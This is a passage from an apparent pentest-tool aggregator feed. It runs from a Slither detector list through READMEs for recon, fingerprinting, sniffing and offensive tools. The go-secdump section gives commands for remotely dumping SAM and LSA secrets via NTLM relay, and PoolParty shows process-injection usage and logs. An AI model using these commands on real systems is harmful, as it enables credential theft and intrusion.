    9 public-mappings-nested Public mappings with nested variables High High
    10 rtlo Right-To-Left-Override control character is used High High
    11 shadowing-state State variables shadowing High High
    12 suicidal Functions allowing anyone to destruct the contract High High
    13 uninitialized-state Uninitialized state variables High High
    14 uninitialized-storage Uninitialized storage variables High High
    15 unprotected-upgrade Unprotected upgradeable contract High High
    16 codex Use Codex to find vulnerabilities. High Low
    17 arbitrary-send-erc20-permit transferFrom uses arbitrary from with permit High Medium
    18 arbitrary-send-eth Functions that send Ether to arbitrary destinations High Medium
    19 controlled-array-length Tainted array length assignment High Medium
    20 controlled-delegatecall Controlled delegatecall destination High Medium
    21 delegatecall-loop Payable functions using delegatecall inside a loop High Medium
    22 incorrect-exp Incorrect exponentiation High Medium
    23 incorrect-return If a return is incorrectly used in assembly mode. High Medium
    24 msg-value-loop msg.value inside a loop High Medium
    25 reentrancy-eth Reentrancy vulnerabilities (theft of ethers) High Medium
    26 return-leave If a return is used instead of a leave. High Medium
    27 storage-array Signed storage integer array compiler bug High Medium
    28 unchecked-transfer Unchecked tokens transfer High Medium
    29 weak-prng Weak PRNG High Medium
    30 domain-separator-collision Detects ERC20 tokens that have a function whose signature collides with EIP-2612's DOMAIN_SEPARATOR() Medium High
    31 enum-conversion Detect dangerous enum conversion Medium High
    32 erc20-interface Incorrect ERC20 interfaces Medium High
    33 erc721-interface Incorrect ERC721 interfaces Medium High
    34 incorrect-equality Dangerous strict equalities Medium High
    35 locked-ether Contracts that lock ether Medium High
    36 mapping-deletion Deletion on mapping containing a structure Medium High
    37 shadowing-abstract State variables shadowing from abstract contracts Medium High
    38 tautological-compare Comparing a variable to itself always returns true or false, depending on comparison Medium High
    39 tautology Tautology or contradiction Medium High
    40 write-after-write Unused write Medium High
    41 boolean-cst Misuse of Boolean constant Medium Medium
    42 constant-function-asm Constant functions using assembly code Medium Medium
    43 constant-function-state Constant functions changing the state Medium Medium
    44 divide-before-multiply Imprecise arithmetic operations order Medium Medium
    45 out-of-order-retryable Out-of-order retryable transactions Medium Medium
    46 reentrancy-no-eth Reentrancy vulnerabilities (no theft of ethers) Medium Medium
    47 reused-constructor Reused base constructor Medium Medium
    48 tx-origin Dangerous usage of tx.origin Medium Medium
    49 unchecked-lowlevel Unchecked low-level calls Medium Medium
    50 unchecked-send Unchecked send Medium Medium
    51 uninitialized-local Uninitialized local variables Medium Medium
    52 unused-return Unused return values Medium Medium
    53 incorrect-modifier Modifiers that can return the default value Low High
    54 shadowing-builtin Built-in symbol shadowing Low High
    55 shadowing-local Local variables shadowing Low High
    56 uninitialized-fptr-cst Uninitialized function pointer calls in constructors Low High
    57 variable-scope Local variables used prior their declaration Low High
    58 void-cst Constructor called not implemented Low High
    59 calls-loop Multiple calls in a loop Low Medium
    60 events-access Missing Events Access Control Low Medium
    61 events-maths Missing Events Arithmetic Low Medium
    62 incorrect-unary Dangerous unary expressions Low Medium
    63 missing-zero-check Missing Zero Address Validation Low Medium
    64 reentrancy-benign Benign reentrancy vulnerabilities Low Medium
    65 reentrancy-events Reentrancy vulnerabilities leading to out-of-order Events Low Medium
    66 return-bomb A low level callee may consume all callers gas unexpectedly. Low Medium
    67 timestamp Dangerous usage of block.timestamp Low Medium
    68 assembly Assembly usage Informational High
    69 assert-state-change Assert state change Informational High
    70 boolean-equal Comparison to boolean constant Informational High
    71 cyclomatic-complexity Detects functions with high (> 11) cyclomatic complexity Informational High
    72 deprecated-standards Deprecated Solidity Standards Informational High
    73 erc20-indexed Un-indexed ERC20 event parameters Informational High
    74 function-init-state Function initializing state variables Informational High
    75 incorrect-using-for Detects using-for statement usage when no function from a given library matches a given type Informational High
    76 low-level-calls Low level calls Informational High
    77 missing-inheritance Missing inheritance Informational High
    78 naming-convention Conformity to Solidity naming conventions Informational High
    79 pragma If different pragma directives are used Informational High
    80 redundant-statements Redundant statements Informational High
    81 solc-version Incorrect Solidity version Informational High
    82 unimplemented-functions Unimplemented functions Informational High
    83 unused-import Detects unused imports Informational High
    84 unused-state Unused state variables Informational High
    85 costly-loop Costly operations in a loop Informational Medium
    86 dead-code Functions that are not used Informational Medium
    87 reentrancy-unlimited-gas Reentrancy vulnerabilities through send and transfer Informational Medium
    88 similar-names Variable names are too similar Informational Medium
    89 too-many-digits Conformance to numeric notation best practices Informational Medium
    90 cache-array-length Detects for loops that use length member of some storage array in their loop condition and don't modify it. Optimization High
    91 constable-states State variables that could be declared constant Optimization High
    92 external-function Public function that could be declared external Optimization High
    93 immutable-states State variables that could be declared immutable Optimization High
    94 var-read-using-this Contract reads its own variable using this Optimization High


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Domainim - A Fast And Comprehensive Tool For Organizational Network Scanning

    By: Zion3R β€” May 26th 2024 at 12:30


    Domainim is a fast domain reconnaissance tool for organizational network scanning. The tool aims to provide a brief overview of an organization's structure using techniques like OSINT, bruteforcing, DNS resolving etc.


    Features

    Current features (v1.0.1)- - Subdomain enumeration (2 engines + bruteforcing) - User-friendly output - Resolving A records (IPv4)

    A fast and comprehensive tool for organizational network scanning (6)

    A fast and comprehensive tool for organizational network scanning (7)

    • Virtual hostname enumeration
    • Reverse DNS lookup

    A fast and comprehensive tool for organizational network scanning (8)

    • Detects wildcard subdomains (for bruteforcing)

    A fast and comprehensive tool for organizational network scanning (9)

    • Basic TCP port scanning
    • Subdomains are accepted as input

    A fast and comprehensive tool for organizational network scanning (10)

    • Export results to JSON file

    A fast and comprehensive tool for organizational network scanning (11)

    A few features are work in progress. See Planned features for more details.

    The project is inspired by Sublist3r. The port scanner module is heavily based on NimScan.

    Installation

    You can build this repo from source- - Clone the repository

    git clone git@github.com:pptx704/domainim
    • Build the binary
    nimble build
    • Run the binary
    ./domainim <domain> [--ports=<ports>]

    Or, you can just download the binary from the release page. Keep in mind that the binary is tested on Debian based systems only.

    Usage

    ./domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
    • <domain> is the domain to be enumerated. It can be a subdomain as well.
    • -- ports | -p is a string speicification of the ports to be scanned. It can be one of the following-
    • all - Scan all ports (1-65535)
    • none - Skip port scanning (default)
    • t<n> - Scan top n ports (same as nmap). i.e. t100 scans top 100 ports. Max value is 5000. If n is greater than 5000, it will be set to 5000.
    • single value - Scan a single port. i.e. 80 scans port 80
    • range value - Scan a range of ports. i.e. 80-100 scans ports 80 to 100
    • comma separated values - Scan multiple ports. i.e. 80,443,8080 scans ports 80, 443 and 8080
    • combination - Scan a combination of the above. i.e. 80,443,8080-8090,t500 scans ports 80, 443, 8080 to 8090 and top 500 ports
    • --dns | -d is the address of the dns server. This should be a valid IPv4 address and can optionally contain the port number-
    • a.b.c.d - Use DNS server at a.b.c.d on port 53
    • a.b.c.d#n - Use DNS server at a.b.c.d on port e
    • --wordlist | -l - Path to the wordlist file. This is used for bruteforcing subdomains. If the file is invalid, bruteforcing will be skipped. You can get a wordlist from SecLists. A wordlist is also provided in the release page.
    • --rps | -r - Number of requests to be made per second during bruteforce. The default value is 1024 req/s. It is to be noted that, DNS queries are made in batches and next batch is made only after the previous one is completed. Since quries can be rate limited, increasing the value does not always guarantee faster results.
    • --out | -o - Path to the output file. The output will be saved in JSON format. The filename must end with .json.

    Examples - ./domainim nmap.org --ports=all - ./domainim google.com --ports=none --dns=8.8.8.8#53 - ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --rps=1500 - ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --outfile=results.json - ./domainim mysite.com --ports=t50,5432,7000-9000 --dns=1.1.1.1

    The help menu can be accessed using ./domainim --help or ./domainim -h.

    Usage:
    domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
    domainim (-h | --help)

    Options:
    -h, --help Show this screen.
    -p, --ports Ports to scan. [default: `none`]
    Can be `all`, `none`, `t<n>`, single value, range value, combination
    -l, --wordlist Wordlist for subdomain bruteforcing. Bruteforcing is skipped for invalid file.
    -d, --dns IP and Port for DNS Resolver. Should be a valid IPv4 with an optional port [default: system default]
    -r, --rps DNS queries to be made per second [default: 1024 req/s]
    -o, --out JSON file where the output will be saved. Filename must end with `.json`

    Examples:
    domainim domainim.com -p:t500 -l:wordlist.txt --dns:1.1.1.1#53 --out=results.json
    domainim sub.domainim.com --ports=all --dns:8.8.8.8 -t:1500 -o:results.json

    The JSON schema for the results is as follows-

    [
    {
    "subdomain": string,
    "data": [
    "ipv4": string,
    "vhosts": [string],
    "reverse_dns": string,
    "ports": [int]
    ]
    }
    ]

    Example json for nmap.org can be found here.

    Contributing

    Contributions are welcome. Feel free to open a pull request or an issue.

    Planned Features

    • [x] TCP port scanning
    • [ ] UDP port scanning support
    • [ ] Resolve AAAA records (IPv6)
    • [x] Custom DNS server
    • [x] Add bruteforcing subdomains using a wordlist
    • [ ] Force bruteforcing (even if wildcard subdomain is found)
    • [ ] Add more engines for subdomain enumeration
    • [x] File output (JSON)
    • [ ] Multiple domain enumeration
    • [ ] Dir and File busting

    Others

    • [x] Update verbose output when encountering errors (v0.2.0)
    • [x] Show progress bar for longer operations
    • [ ] Add individual port scan progress bar
    • [ ] Add tests
    • [ ] Add comments and docstrings

    Additional Notes

    This project is still in its early stages. There are several limitations I am aware of.

    The two engines I am using (I'm calling them engine because Sublist3r does so) currently have some sort of response limit. dnsdumpster.com">dnsdumpster can fetch upto 100 subdomains. crt.sh also randomizes the results in case of too many results. Another issue with crt.sh is the fact that it returns some SQL error sometimes. So for some domain, results can be different for different runs. I am planning to add more engines in the future (at least a brute force engine).

    The port scanner has only ping response time + 750ms timeout. This might lead to false negatives. Since, domainim is not meant for port scanning but to provide a quick overview, such cases are acceptable. However, I am planning to add a flag to increase the timeout. For the same reason, filtered ports are not shown. For more comprehensive port scanning, I recommend using Nmap. Domainim also doesn't bypass rate limiting (if there is any).

    It might seem that the way vhostnames are printed, it just brings repeition on the table.

    A fast and comprehensive tool for organizational network scanning (12)

    Printing as the following might've been better-

    ack.nmap.org, issues.nmap.org, nmap.org, research.nmap.org, scannme.nmap.org, svn.nmap.org, www.nmap.org
    ↳ 45.33.49.119
    ↳ Reverse DNS: ack.nmap.org.

    But previously while testing, I found cases where not all IPs are shared by same set of vhostnames. That is why I decided to keep it this way.

    A fast and comprehensive tool for organizational network scanning (13)

    DNS server might have some sort of rate limiting. That's why I added random delays (between 0-300ms) for IPv4 resolving per query. This is to not make the DNS server get all the queries at once but rather in a more natural way. For bruteforcing method, the value is between 0-1000ms by default but that can be changed using --rps | -t flag.

    One particular limitation that is bugging me is that the DNS resolver would not return all the IPs for a domain. So it is necessary to make multiple queries to get all (or most) of the IPs. But then again, it is not possible to know how many IPs are there for a domain. I still have to come up with a solution for this. Also, nim-ndns doesn't support CNAME records. So, if a domain has a CNAME record, it will not be resolved. I am waiting for a response from the author for this.

    For now, bruteforcing is skipped if a possible wildcard subdomain is found. This is because, if a domain has a wildcard subdomain, bruteforcing will resolve IPv4 for all possible subdomains. However, this will skip valid subdomains also (i.e. scanme.nmap.org will be skipped even though it's not a wildcard value). I will add a --force-brute | -fb flag later to force bruteforcing.

    Similar thing is true for VHost enumeration for subdomain inputs. Since, urls that ends with given subdomains are returned, subdomains of similar domains are not considered. For example, scannme.nmap.org will not be printed for ack.nmap.org but something.ack.nmap.org might be. I can search for all subdomains of nmap.org but that defeats the purpose of having a subdomains as an input.

    License

    MIT License. See LICENSE for full text.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    JA4+ - Suite Of Network Fingerprinting Standards

    By: Zion3R β€” May 25th 2024 at 12:30


    JA4+ is a suite of network FingerprintingΒ methods that are easy to use and easy to share. These methods are both human and machine readable to facilitate more effective threat-hunting and analysis. The use-cases for these fingerprints include scanning for threat actors, malware detection, session hijacking prevention, compliance automation, location tracking, DDoS detection, grouping of threat actors, reverse shell detection, and many more.

    Please read our blogs for details on how JA4+ works, why it works, and examples of what can be detected/prevented with it:
    JA4+ Network Fingerprinting (JA4/S/H/L/X/SSH)
    JA4T: TCP Fingerprinting (JA4T/TS/TScan)


    To understand how to read JA4+ fingerprints, see Technical Details

    This repo includes JA4+ Python, Rust, Zeek and C, as a Wireshark plugin.

    JA4/JA4+ support is being added to:
    GreyNoise
    Hunt
    Driftnet
    DarkSail
    Arkime
    GoLang (JA4X)
    Suricata
    Wireshark
    Zeek
    nzyme
    Netresec's CapLoader
    NetworkMiner">Netresec's NetworkMiner
    NGINX
    F5 BIG-IP
    nfdump
    ntop's ntopng
    ntop's nDPI
    Team Cymru
    NetQuest
    Censys
    Exploit.org's Netryx
    cloudflare.com/bots/concepts/ja3-ja4-fingerprint/">Cloudflare
    fastly
    with more to be announced...

    Examples

    Application JA4+ Fingerprints
    Chrome JA4=t13d1516h2_8daaf6152771_02713d6af862 (TCP)
    JA4=q13d0312h3_55b375c5d22e_06cda9e17597 (QUIC)
    JA4=t13d1517h2_8daaf6152771_b0da82dd1658 (pre-shared key)
    JA4=t13d1517h2_8daaf6152771_b1ff8ab2d16f (no key)
    IcedID Malware Dropper JA4H=ge11cn020000_9ed1ff1f7b03_cd8dafe26982
    IcedID Malware JA4=t13d201100_2b729b4bf6f3_9e7b989ebec8
    JA4S=t120300_c030_5e2616a54c73
    Sliver Malware JA4=t13d190900_9dc949149365_97f8aa674fd9
    JA4S=t130200_1301_a56c5b993250
    JA4X=000000000000_4f24da86fad6_bf0f0589fc03
    JA4X=000000000000_7c32fa18c13e_bf0f0589fc03
    Cobalt Strike JA4H=ge11cn060000_4e59edc1297a_4da5efaf0cbd
    JA4X=2166164053c1_2166164053c1_30d204a01551
    SoftEther VPN JA4=t13d880900_fcb5b95cb75a_b0d3b4ac2a14 (client)
    JA4S=t130200_1302_a56c5b993250
    JA4X=d55f458d5a6c_d55f458d5a6c_0fc8c171b6ae
    Qakbot JA4X=2bab15409345_af684594efb4_000000000000
    Pikabot JA4X=1a59268f55e5_1a59268f55e5_795797892f9c
    Darkgate JA4H=po10nn060000_cdb958d032b0
    LummaC2 JA4H=po11nn050000_d253db9d024b
    Evilginx JA4=t13d191000_9dc949149365_e7c285222651
    Reverse SSH Shell JA4SSH=c76s76_c71s59_c0s70
    Windows 10 JA4T=64240_2-1-3-1-1-4_1460_8
    Epson Printer JA4TScan=28960_2-4-8-1-3_1460_3_1-4-8-16

    For more, see ja4plus-mapping.csv
    The mapping file is unlicensed and free to use. Feel free to do a pull request with any JA4+ data you find.

    Plugins

    Wireshark
    Zeek
    Arkime

    Binaries

    Recommended to have tshark version 4.0.6 or later for full functionality. See: https://pkgs.org/search/?q=tshark

    Download the latest JA4 binaries from: Releases.

    JA4+ on Ubuntu

    sudo apt install tshark
    ./ja4 [options] [pcap]

    JA4+ on Mac

    1) Install Wireshark https://www.wireshark.org/download.html which will install tshark 2) Add tshark to $PATH

    ln -s /Applications/Wireshark.app/Contents/MacOS/tshark /usr/local/bin/tshark
    ./ja4 [options] [pcap]

    JA4+ on Windows

    1) Install Wireshark for Windows from https://www.wireshark.org/download.html which will install tshark.exe
    tshark.exe is at the location where wireshark is installed, for example: C:\Program Files\Wireshark\thsark.exe
    2) Add the location of tshark to your "PATH" environment variable in Windows.
    (System properties > Environment Variables... > Edit Path)
    3) Open cmd, navigate the ja4 folder

    ja4 [options] [pcap]

    Database

    An official JA4+ database of fingerprints, associated applications and recommended detection logic is in the process of being built.

    In the meantime, see ja4plus-mapping.csv

    Feel free to do a pull request with any JA4+ data you find.

    JA4+ Details

    JA4+ is a set of simple yet powerful network fingerprints for multiple protocols that are both human and machine readable, facilitating improved threat-hunting and security analysis. If you are unfamiliar with network fingerprinting, I encourage you to read my blogs releasing JA3 here, JARM here, and this excellent blog by Fastly on the State of TLS Fingerprinting which outlines the history of the aforementioned along with their problems. JA4+ brings dedicated support, keeping the methods up-to-date as the industry changes.

    All JA4+ fingerprints have an a_b_c format, delimiting the different sections that make up the fingerprint. This allows for hunting and detection utilizing just ab or ac or c only. If one wanted to just do analysis on incoming cookies into their app, they would look at JA4H_c only. This new locality-preserving format facilitates deeper and richer analysis while remaining simple, easy to use, and allowing for extensibility.

    For example; GreyNoise is an internet listener that identifies internet scanners and is implementing JA4+ into their product. They have an actor who scans the internet with a constantly changing single TLS cipher. This generates a massive amount of completely different JA3 fingerprints but with JA4, only the b part of the JA4 fingerprint changes, parts a and c remain the same. As such, GreyNoise can track the actor by looking at the JA4_ac fingerprint (joining a+c, dropping b).

    Current methods and implementation details:
    | Full Name | Short Name | Description | |---|---|---| | JA4 | JA4 | TLS Client Fingerprinting
    | JA4Server | JA4S | TLS Server Response / Session Fingerprinting | JA4HTTP | JA4H | HTTP Client Fingerprinting | JA4Latency | JA4L | Latency Measurment / Light Distance | JA4X509 | JA4X | X509 TLS Certificate Fingerprinting | JA4SSH | JA4SSH | SSH Traffic Fingerprinting | JA4TCP | JA4T | TCP Client Fingerprinting | JA4TCPServer | JA4TS | TCP Server Response Fingerprinting | JA4TCPScan | JA4TScan | Active TCP Fingerprint Scanner

    The full name or short name can be used interchangeably. Additional JA4+ methods are in the works...

    To understand how to read JA4+ fingerprints, see Technical Details

    Licensing

    JA4: TLS Client Fingerprinting is open-source, BSD 3-Clause, same as JA3. FoxIO does not have patent claims and is not planning to pursue patent coverage for JA4 TLS Client Fingerprinting. This allows any company or tool currently utilizing JA3 to immediately upgrade to JA4 without delay.

    JA4S, JA4L, JA4H, JA4X, JA4SSH, JA4T, JA4TScan and all future additions, (collectively referred to as JA4+) are licensed under the FoxIO License 1.1. This license is permissive for most use cases, including for academic and internal business purposes, but is not permissive for monetization. If, for example, a company would like to use JA4+ internally to help secure their own company, that is permitted. If, for example, a vendor would like to sell JA4+ fingerprinting as part of their product offering, they would need to request an OEM license from us.

    All JA4+ methods are patent pending.
    JA4+ is a trademark of FoxIO

    JA4+ can and is being implemented into open source tools, see the License FAQ for details.

    This licensing allows us to provide JA4+ to the world in a way that is open and immediately usable, but also provides us with a way to fund continued support, research into new methods, and the development of the upcoming JA4 Database. We want everyone to have the ability to utilize JA4+ and are happy to work with vendors and open source projects to help make that happen.

    ja4plus-mapping.csv is not included in the above software licenses and is thereby a license-free file.

    Q&A

    Q: Why are you sorting the ciphers? Doesn't the ordering matter?
    A: It does but in our research we've found that applications and libraries choose a unique cipher list more than unique ordering. This also reduces the effectiveness of "cipher stunting," a tactic of randomizing cipher ordering to prevent JA3 detection.

    Q: Why are you sorting the extensions?
    A: Earlier in 2023, Google updated Chromium browsers to randomize their extension ordering. Much like cipher stunting, this was a tactic to prevent JA3 detection and "make the TLS ecosystem more robust to changes." Google was worried server implementers would assume the Chrome fingerprint would never change and end up building logic around it, which would cause issues whenever Google went to update Chrome.

    So I want to make this clear: JA4 fingerprints will change as application TLS libraries are updated, about once a year. Do not assume fingerprints will remain constant in an environment where applications are updated. In any case, sorting the extensions gets around this and adding in Signature Algorithms preserves uniqueness.

    Q: Doesn't TLS 1.3 make fingerprinting TLS clients harder?
    A: No, it makes it easier! Since TLS 1.3, clients have had a much larger set of extensions and even though TLS1.3 only supports a few ciphers, browsers and applications still support many more.

    JA4+ was created by:

    John Althouse, with feedback from:

    Josh Atkins
    Jeff Atkinson
    Joshua Alexander
    W.
    Joe Martin
    Ben Higgins
    Andrew Morris
    Chris Ueland
    Ben Schofield
    Matthias Vallentin
    Valeriy Vorotyntsev
    Timothy Noel
    Gary Lipsky
    And engineers working at GreyNoise, Hunt, Google, ExtraHop, F5, Driftnet and others.

    Contact John Althouse at john@foxio.io for licensing and questions.

    Copyright (c) 2024, FoxIO



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    PoolParty - A Set Of Fully-Undetectable Process Injection Techniques Abusing Windows Thread Pools

    By: Zion3R β€” May 24th 2024 at 12:30


    A collection of fully-undetectable process injection techniques abusing Windows Thread Pools. Presented at Black Hat EU 2023 Briefings under the title - injection-techniques-using-windows-thread-pools-35446">The Pool Party You Will Never Forget: New Process Injection Techniques Using Windows Thread Pools


    PoolParty Variants

    Variant ID Varient Description
    1 Overwrite the start routine of the target worker factory
    2 Insert TP_WORK work item to the target process's thread pool
    3 Insert TP_WAIT work item to the target process's thread pool
    4 Insert TP_IO work item to the target process's thread pool
    5 Insert TP_ALPC work item to the target process's thread pool
    6 Insert TP_JOB work item to the target process's thread pool
    7 Insert TP_DIRECT work item to the target process's thread pool
    8 Insert TP_TIMER work item to the target process's thread pool

    Usage

    PoolParty.exe -V <VARIANT ID> -P <TARGET PID>

    Usage Examples

    Insert TP_TIMER work item to process ID 1234

    >> PoolParty.exe -V 8 -P 1234

    [info] Starting PoolParty attack against process id: 1234
    [info] Retrieved handle to the target process: 00000000000000B8
    [info] Hijacked worker factory handle from the target process: 0000000000000058
    [info] Hijacked timer queue handle from the target process: 0000000000000054
    [info] Allocated shellcode memory in the target process: 00000281DBEF0000
    [info] Written shellcode to the target process
    [info] Retrieved target worker factory basic information
    [info] Created TP_TIMER structure associated with the shellcode
    [info] Allocated TP_TIMER memory in the target process: 00000281DBF00000
    [info] Written the specially crafted TP_TIMER structure to the target process
    [info] Modified the target process's TP_POOL tiemr queue list entry to point to the specially crafted TP_TIMER
    [info] Set the timer queue to expire to trigger the dequeueing TppTimerQueueExp iration
    [info] PoolParty attack completed successfully

    Default Shellcode and Customization

    The default shellcode spawns a calculator via the WinExec API.

    To customize the executable to execute, change the path in the end of the g_Shellcode variable present in the main.cpp file.

    Author - Alon Leviev



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Go-Secdump - Tool To Remotely Dump Secrets From The Windows Registry

    By: Zion3R β€” May 23rd 2024 at 12:30


    Package go-secdump is a tool built to remotely extract hashes from the SAM registry hive as well as LSA secrets and cached hashes from the SECURITY hive without any remote agent and without touching disk.

    The tool is built on top of the library go-smb and use it to communicate with the Windows Remote Registry to retrieve registry keys directly from memory.

    It was built as a learning experience and as a proof of concept that it should be possible to remotely retrieve the NT Hashes from the SAM hive and the LSA secrets as well as domain cached credentials without having to first save the registry hives to disk and then parse them locally.

    The main problem to overcome was that the SAM and SECURITY hives are only readable by NT AUTHORITY\SYSTEM. However, I noticed that the local group administrators had the WriteDACL permission on the registry hives and could thus be used to temporarily grant read access to itself to retrieve the secrets and then restore the original permissions.


    Credits

    Much of the code in this project is inspired/taken from Impacket's secdump but converted to access the Windows registry remotely and to only access the required registry keys.

    Some of the other sources that have been useful to understanding the registry structure and encryption methods are listed below:

    https://www.passcape.com/index.php?section=docsys&cmd=details&id=23

    http://www.beginningtoseethelight.org/ntsecurity/index.htm

    https://social.technet.microsoft.com/Forums/en-US/6e3c4486-f3a1-4d4e-9f5c-bdacdb245cfd/how-are-ntlm-hashes-stored-under-the-v-key-in-the-sam?forum=win10itprogeneral

    Usage

    Usage: ./go-secdump [options]

    options:
    --host <target> Hostname or ip address of remote server
    -P, --port <port> SMB Port (default 445)
    -d, --domain <domain> Domain name to use for login
    -u, --user <username> Username
    -p, --pass <pass> Password
    -n, --no-pass Disable password prompt and send no credentials
    --hash <NT Hash> Hex encoded NT Hash for user password
    --local Authenticate as a local user instead of domain user
    --dump Saves the SAM and SECURITY hives to disk and
    transfers them to the local machine.
    --sam Extract secrets from the SAM hive explicitly. Only other explicit targets are included.
    --lsa Extract LSA secrets explicitly. Only other explicit targets are included.
    --dcc2 Extract DCC2 caches explicitly. Only ohter explicit targets are included.
    --backup-dacl Save original DACLs to disk before modification
    --restore-dacl Restore DACLs using disk backup. Could be useful if automated restore fails.
    --backup-file Filename for DACL backup (default dacl.backup)
    --relay Start an SMB listener that will relay incoming
    NTLM authentications to the remote server and
    use that connection. NOTE that this forces SMB 2.1
    without encryption.
    --relay-port <port> Listening port for relay (default 445)
    --socks-host <target> Establish connection via a SOCKS5 proxy server
    --socks-port <port> SOCKS5 proxy port (default 1080)
    -t, --timeout Dial timeout in seconds (default 5)
    --noenc Disable smb encryption
    --smb2 Force smb 2.1
    --debug Enable debug logging
    --verbose Enable verbose logging
    -o, --output Filename for writing results (default is stdout). Will append to file if it exists.
    -v, --version Show version

    Changing DACLs

    go-secdump will automatically try to modify and then restore the DACLs of the required registry keys. However, if something goes wrong during the restoration part such as a network disconnect or other interrupt, the remote registry will be left with the modified DACLs.

    Using the --backup-dacl argument it is possible to store a serialized copy of the original DACLs before modification. If a connectivity problem occurs, the DACLs can later be restored from file using the --restore-dacl argument.

    Examples

    Dump all registry secrets

    ./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local
    or
    ./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam --lsa --dcc2

    Dump only SAM, LSA, or DCC2 cache secrets

    ./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam
    ./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --lsa
    ./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --dcc2

    NTLM Relaying

    Dump registry secrets using NTLM relaying

    Start listener

    ./go-secdump --host 192.168.0.100 -n --relay

    Trigger an auth to your machine from a client with administrative access to 192.168.0.100 somehow and then wait for the dumped secrets.

    YYYY/MM/DD HH:MM:SS smb [Notice] Client connected from 192.168.0.30:49805
    YYYY/MM/DD HH:MM:SS smb [Notice] Client (192.168.0.30:49805) successfully authenticated as (domain.local\Administrator) against (192.168.0.100:445)!
    Net-NTLMv2 Hash: Administrator::domain.local:34f4533b697afc39:b4dcafebabedd12deadbeeffef1cea36:010100000deadbeef59d13adc22dda0
    2023/12/13 14:47:28 [Notice] [+] Signing is NOT required
    2023/12/13 14:47:28 [Notice] [+] Login successful as domain.local\Administrator
    [*] Dumping local SAM hashes
    Name: Administrator
    RID: 500
    NT: 2727D7906A776A77B34D0430EAACD2C5

    Name: Guest
    RID: 501
    NT: <empty>

    Name: DefaultAccount
    RID: 503
    NT: <empty>

    Name: WDAGUtilityAccount
    RID: 504
    NT: <empty>

    [*] Dumping LSA Secrets
    [*] $MACHINE.ACC
    $MACHINE.ACC: 0x15deadbeef645e75b38a50a52bdb67b4
    $MACHINE.ACC:plain_password_hex:47331e26f48208a7807cafeababe267261f79fdc 38c740b3bdeadbeef7277d696bcafebabea62bb5247ac63be764401adeadbeef4563cafebabe43692deadbeef03f...
    [*] DPAPI_SYSTEM
    dpapi_machinekey: 0x8afa12897d53deadbeefbd82593f6df04de9c100
    dpapi_userkey: 0x706e1cdea9a8a58cafebabe4a34e23bc5efa8939
    [*] NL$KM
    NL$KM: 0x53aa4b3d0deadbeef42f01ef138c6a74
    [*] Dumping cached domain credentials (domain/username:hash)
    DOMAIN.LOCAL/Administrator:$DCC2$10240#Administrator#97070d085deadbeef22cafebabedd1ab
    ...

    SOCKS Proxy

    Dump secrets using an upstream SOCKS5 proxy either for pivoting or to take advantage of Impacket's ntlmrelayx.py SOCKS server functionality.

    When using ntlmrelayx.py as the upstream proxy, the provided username must match that of the authenticated client, but the password can be empty.

    ./ntlmrelayx.py -socks -t 192.168.0.100 -smb2support --no-http-server --no-wcf-server --no-raw-server
    ...

    ./go-secdump --host 192.168.0.100 --user Administrator -n --socks-host 127.0.0.1 --socks-port 1080


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Above - Invisible Network Protocol Sniffer

    By: Zion3R β€” May 22nd 2024 at 12:30


    Invisible protocol sniffer for finding vulnerabilities in the network. Designed for pentesters and security engineers.


    Above: Invisible network protocol sniffer
    Designed for pentesters and security engineers

    Author: Magama Bazarov, <caster@exploit.org>
    Pseudonym: Caster
    Version: 2.6
    Codename: Introvert

    Disclaimer

    All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.

    It is a specialized network security tool that helps both pentesters and security professionals.

    Mechanics

    Above is a invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it does not make any noise on the air. He's invisible. Completely based on the Scapy library.

    Above allows pentesters to automate the process of finding vulnerabilities in network hardware. Discovery protocols, dynamic routing, 802.1Q, ICS Protocols, FHRP, STP, LLMNR/NBT-NS, etc.

    Supported protocols

    Detects up to 27 protocols:

    MACSec (802.1X AE)
    EAPOL (Checking 802.1X versions)
    ARP (Passive ARP, Host Discovery)
    CDP (Cisco Discovery Protocol)
    DTP (Dynamic Trunking Protocol)
    LLDP (Link Layer Discovery Protocol)
    802.1Q Tags (VLAN)
    S7COMM (Siemens)
    OMRON
    TACACS+ (Terminal Access Controller Access Control System Plus)
    ModbusTCP
    STP (Spanning Tree Protocol)
    OSPF (Open Shortest Path First)
    EIGRP (Enhanced Interior Gateway Routing Protocol)
    BGP (Border Gateway Protocol)
    VRRP (Virtual Router Redundancy Protocol)
    HSRP (Host Standby Redundancy Protocol)
    GLBP (Gateway Load Balancing Protocol)
    IGMP (Internet Group Management Protocol)
    LLMNR (Link Local Multicast Name Resolution)
    NBT-NS (NetBIOS Name Service)
    MDNS (Multicast DNS)
    DHCP (Dynamic Host Configuration Protocol)
    DHCPv6 (Dynamic Host Configuration Protocol v6)
    ICMPv6 (Internet Control Message Protocol v6)
    SSDP (Simple Service Discovery Protocol)
    MNDP (MikroTik Neighbor Discovery Protocol)

    Operating Mechanism

    Above works in two modes:

    • Hot mode: Sniffing on your interface specifying a timer
    • Cold mode: Analyzing traffic dumps

    The tool is very simple in its operation and is driven by arguments:

    • Interface: Specifying the network interface on which sniffing will be performed
    • Timer: Time during which traffic analysis will be performed
    • Input: The tool takes an already prepared .pcap as input and looks for protocols in it
    • Output: Above will record the listened traffic to .pcap file, its name you specify yourself
    • Passive ARP: Detecting hosts in a segment using Passive ARP
